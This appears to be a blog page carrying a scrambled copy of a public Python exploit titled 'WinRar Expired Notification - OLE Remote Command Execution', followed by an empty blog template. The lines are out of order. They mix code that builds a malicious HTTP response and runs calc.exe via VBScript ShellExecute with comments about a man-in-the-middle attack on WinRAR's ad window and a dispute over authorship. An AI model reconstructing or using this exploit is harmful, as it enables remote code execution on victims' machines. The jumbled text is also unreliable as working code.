![]() Response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF IntVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) Shell.ShellExecute "calc.exe", "runas", 0 Set shell=createobject("Shell.Application") Print " WinRar (Free Version) - Remote Command Execution \n" # merezaes, reza.esparghamgmailcom doesnt steals again my exploit. # i hope this time the "great security researcher" Mohammad Reza Espargham # 4) Wait for the victim to open WinRar files. # Since this uses a http connection we can use Man In The Middle attack # reminding user to buy winrar to remove ads. # A window with Expired Notification title loads # When a user opens any WINRAR file sometimes # This exploits a vulnerability in the implementation of showing ads. ![]() # Tested on : Windows Xp SP3 with WinRAR 5.21 ![]() # Title : WinRar Expired Notification - OLE Remote Command Execution Change Mirror Download #!/usr/bin/python -w
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |